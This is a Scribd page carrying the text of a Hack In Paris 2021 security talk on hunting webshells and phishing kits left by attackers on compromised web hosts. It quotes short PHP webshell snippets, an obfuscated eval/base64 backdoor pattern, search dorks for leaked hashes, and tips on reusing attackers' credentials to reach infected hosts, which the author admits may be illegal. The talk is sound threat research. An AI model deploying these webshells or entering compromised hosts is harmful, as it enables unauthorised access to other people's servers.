Scribd
Upload
6 views

HIP_2021_CannibalHacking

The document presents a talk by a security researcher discussing web security vulnerabilities, attacker techniques, and lessons learned from real-life examples. It emphasizes the importance of understanding how attackers operate, the tools they use, and the mistakes they make, while also providing insights into how to better secure web applications. The conclusion highlights the evolving landscape of web security and the need for continuous vigilance against various types of cyber threats.

Uploaded by

Ramos Presley
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
6 views

HIP_2021_CannibalHacking

The document presents a talk by a security researcher discussing web security vulnerabilities, attacker techniques, and lessons learned from real-life examples. It emphasizes the importance of understanding how attackers operate, the tools they use, and the mistakes they make, while also providing insights into how to better secure web applications. The conclusion highlights the evolving landscape of web security and the need for continuous vigilance against various types of cyber threats.

Uploaded by

Ramos Presley
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 72

Cannibal Hacking, from zero the hero to hammer smashed host

Hack In Paris 2021

19 novembre 2021

Synacktiv

0xMitsurugi
Table of contents

1 Introduction

2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal

5 Real life example


Presentation

Security researcher @Synacktiv


Vulnerability research & exploitation
Disclaimer : this research is done on
personal time
0xMitsurugi

My company
https ://www.synacktiv.com
Offensive security company, based in France
We’re hiring !
reverse, pentest, DFIR, dev
interns !
just ask

3/71
Let start !

IDA <3

4/71
Let start !

IDA <3

5/71
About this talk

Warning
lack of asm, lack of 0-days
lack of legal base ¯\(°_o)/¯

Webshells, attackers, scans


HTTP is everywhere
Seen weird logs ? weird files ? webshells ? This is it !

Times flies…
It’s been a long long time
COVID, delays, and so on, parts of this document are more than 2 years old…
Oldies still goodies

6/71
Table of contents

1 Introduction

2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal

5 Real life example


The bad guys

How to don’t get caught when delivering malware


Don’t host it yourself
Use innocent victims
Hack them, and use those hosts !

Which malware ?
phishing
mirai/gafgyt/bots/malware
data hosting
defacing (less and less)
any other purpose

8/71
The bad guys

Yummy ! restaurant

9/71
The bad guys

Teach a man to phish…

10/71
The poor admins

Don’t blame the admins


Usually, no time to patch
Not always tech people
Security is hard (sad but true)
Password ‘password’ is a good idea, no ? … No ?

And time flies


Company disappears but website still up
Website forgotten (last blog update 2014)

11/71
But pirates are admin too !

Guess what
They are no better
weak passwords
same technics reused again and again
Lots of artefacts left

And bad infras


they hack poorly configured hosts ?
they are poorly secured too !
directory listing enabled…
host multi-infected…

12/71
Table of contents

1 Introduction

2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal

5 Real life example


Search all the things

Goooooooooogle…

14/71
Dork like a boss
Just search..

Good google
Google is good ? evil ?
Google hides results
Be better than google

15/71
Dork like a boss

853 only ??

16/71
Dork like a boss

Better

17/71
Dork like a boss

Words are blacklisted


Don’t search for “password leaks” or “email hacked”

Better
gmail.com e10adc3949ba59abbe56e057f20f883e ext:txt

Why ?

$ echo -n 123456 | md5sum


e10adc3949ba59abbe56e057f20f883e
$

18/71
Dork like a boss

Webshells
search for name of webshells
(yes it works..)
search for upload dirs
search for opendir
Use virustotal, urlscan and so on

Scrap google
use archive
go back in time when DNS are wiped :
curl --resolve infected.com:80:A.B.C.D https://infected.com

19/71
Dork like a boss

think like a bad guy


how would be name a webshell or command php file ?
x.php ? cmd.php ? zz.php ?
easy targets ? upload dirs ?

think like a phisher


do you remove your phish kit ?
is the name paypal.zip ? bank.zip ? netflix.zip ?

20/71
Dork like a boss

Juicy search

21/71
Dork like a boss

Webshell

22/71
Dork like a boss

File Manager

23/71
Dork like a boss

perlbot, yikes !

24/71
Dork like a boss

Another webshell

25/71
Dork like a boss

And another webshell

26/71
Dork like a boss

And, yaaawn, another webshell

27/71
Dork like a boss

Wanna passwords ?

28/71
Dork like a boss

Bad google
Google is clever and know those tricks
Prepare to get captcha-ed !

Bad searches
intitle:webshell
all of the so-called “best dork of 2020” you found

And honeypots
You won’t learn anything

29/71
Dork like a boss

Bim

30/71
Dork like a boss

Bim

31/71
Dork like a boss

Honeypot :(

32/71
Bounce like a boss

You get access !


Bad guys make mistakes, use them
Hosts are multi infected !
Reuse credzs

One more time for the merry-go round


Another webshell named “haxor webshell” ?
google intitle:haxor.webshell

Explore directories !
cheap hoster –> all hosts infected !
access.log –> find other webshell

33/71
Bounce like a boss

Starts with a phish

34/71
Bounce like a boss

Then a host

35/71
Bounce like a boss

Then a host

36/71
Bounce like a boss

With free webshell !!

37/71
Bounce like a boss

user@debian$ du -hs infected/


1.5G infected/
user@debian$

38/71
Table of contents

1 Introduction

2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal

5 Real life example


Analyze all the files

From old to new


oldest files are perl bots (yes.. perl)
then C99
then webshells
file managers
minimalist webshells : uploader/unzipper
password protection…

PHP for the win


yes, php is over-represented
some asp webshell, but it’s negligeable

40/71
Analyze all the files

Copy pasting
A lot of webshells
A gazillion of copies for each
Same with phish kits
Same with file managers
Passwords are usually bad
If you have one shot, try ‘cracking’

41/71
Making fun of mistakes

Yay ! Mistakes !

(...)
$PASS='4d1f35512954cb227b25bbd92e15bc7b'; //$PASS=cracking

(...)
$PASS=md5('cracking')

<label for=”Password”>Password:</label><H1>cracking</H1>
<input class=”password” type=”password” id=”Password” name=”Password”
/>

42/71
Making fun of mistakes

Yay ! Mistakes !

$PASS='4d1f35512954cb227b25bbd92e15bc7b';
$password = md5($_GET['pass']);
if (($password == $PASS) or (apache_request_headers()['L'] == 'L')) {
print(”Access granted”);
} else {
die();
}

Yes some hackers are bad…


uploads x.php, x.php.txt, x.jpg, x.gif, x.php7, x.php.html …

43/71
Making fun of mistakes

Yeah, bro put your mail here !

44/71
Backdooring the backdoor

Coding a webshell is hard, so..


Why don’t reuse this nice webshell found on a site with skulls and flame ?

Pirates are not nice to each others


webshells are backdoored !
sometime twice !
and someone backdoor is backdoored (!?)

45/71
Backdooring the backdoor

<?php
(lot of php stuff)
eval(gzuncompress(base64_decode('a long string .... ')));
(again a lot of php stuff)
?>

46/71
Attacker defense

Bad guys are lame in security ? Not at all..


.htaccess
antibots
passwords
fake 404
header checks
bouncers..

And annoying stuff


eval gzipped eval gzipped etc…
scrambling
php obfuscation
not efficient against motivated ones, but..

47/71
Attacker defense

/*------------------ Anti Crawler ------------*/


if(!empty($_SERVER['HTTP_USER_AGENT']))
{
$userAgents = array(”Google”, ”Slurp”, ”MSNBot”, ”ia_archiver”, ”
Yandex”, ”Rambler”);
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['
HTTP_USER_AGENT']))
{
header('HTTP/1.0 404 Not Found');
exit;
}
}
echo ”<meta name=\”ROBOTS\” content=\”NOINDEX, NOFOLLOW\” />”; //For
Ensuring... Fuck all Robots...
/*------------------ End of Anti Crawler -----*/

48/71
Attacker defense

Some anti-something

49/71
Attacker defense

Crude language

50/71
Attacker defense

Much ASCII ART

51/71
Attacker defense

htaccess
sometime small, sometime big, sometime fun

A.B.C.D // leecher!
E.F.G.H // NSA or google
I.J.K.L // fuck you!

52/71
Attacker defense

more and more passwords…


the old days

<?php
system($_GET['cmd']);
?>

and now..

<?php
if isset($_GET['aef']) { system($_POST['vji']); }
?>

53/71
But, how they came in ? Can we know ?

No DFIR today..
Sometime easy to guess
unauth upload dir
old vulnerable stuff
Sometime impossible
ssh bruteforce ?
other host ?
other vector ?

54/71
Table of contents

1 Introduction

2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal

5 Real life example


Intermission 1

An innocent host with a view


Day 1, windows malware
Adding each day a malware for a week (low score on VT)
Day 10 phishing campaign (successfull)
Day 11 phishing campaign (total failure)
Day 11 to 15 : tons of new directories, half installed phish kits
Day 15 everything wiped
Day 15 webserver deactivated

56/71
Curious cases of phishing failures

Teach a man to phish..


zip kits are forgotten on servers
… kits are poorly configured
… and sometimes multi-trojanized
… with results left on servers (???)
and sometimes with no results at all…

WHO earns money with that ?


users of phishing kits ?
sellers of phishing kits ?

57/71
Curious cases of phishing failures

Bro, I have all yours victims

58/71
Curious cases of phishing failures

Brand new 2021 they said…

59/71
Curious cases of phishing failures

Prepare to get bored


intitle:index.of intext:paypal.zip
download, grep for fopen
results in real time if you’re quick enough
really disappointing

60/71
The boring case of Mirai/gafgyt and other bots

Mirai, gafgyt, and so on…


more boring than phish kits
always the same
follow the C&C for fun (?)
search for name, or client.c and server.c

61/71
Exceptionnaly

Once in while
new malware variant
strong code

Example of unknown source (troldesh maybe ?)


Cheap technic
High impact

Still unclear
webshell well hidden
good passwords

62/71
Analyze all the files

Technic
A full wordpress theme uploaded
PHP code embedded in a wordpress variable (or base64 png)
Custom extraction routine
Password MD5 used as a seed to decrypt php
Still working on it

63/71
Analyze all the files

First part is unsuspicious, but

64/71
Analyze all the files

something bad happens here

65/71
Table of contents

1 Introduction

2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal

5 Real life example


From Zero to Hero

Does warning admins works ?


Sometime, I send mail
I can count on one hand the answers
But evil files tend to disappear :)

Who are those attackers ?


cheap technics
cheap attackers
as long as it works, they’ll continue

67/71
Don’t get your host smashed

Patch, update, maintain


Terminate old servers,
Patch others,
Give strong passwords,
Audits,
yadda yadda…

$ grep -r 'exec(gzdecode' /var/www

68/71
Table of contents

1 Introduction

2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal

5 Real life example


Is there a turning point ?

Personal thought
Landscape is evolving
Less and less “personal” webservers
More and more facebook pages, no more personal blog
Or less and less PHP ?
pirates are better at hiding ?
or more and more exposure
trackers etc..

70/71
Final words ?

bad guys are here


phisher, wannabee hacker, kiddies, bots…
loosy php scripts
they are not always lame, we just find the lamest

google is (bad|good)
Finding bad guys is harder

warning
I’m not a lawyer, but : don’t do this at home, it may be highly illegal
use tor (at the cost at high captcha rates)
use kali in live mode in VM in a burner laptop

71/71
DO YOU HAVE
ANY QUESTIONS ?

THANK YOU FOR YOUR ATTENTION

You might also like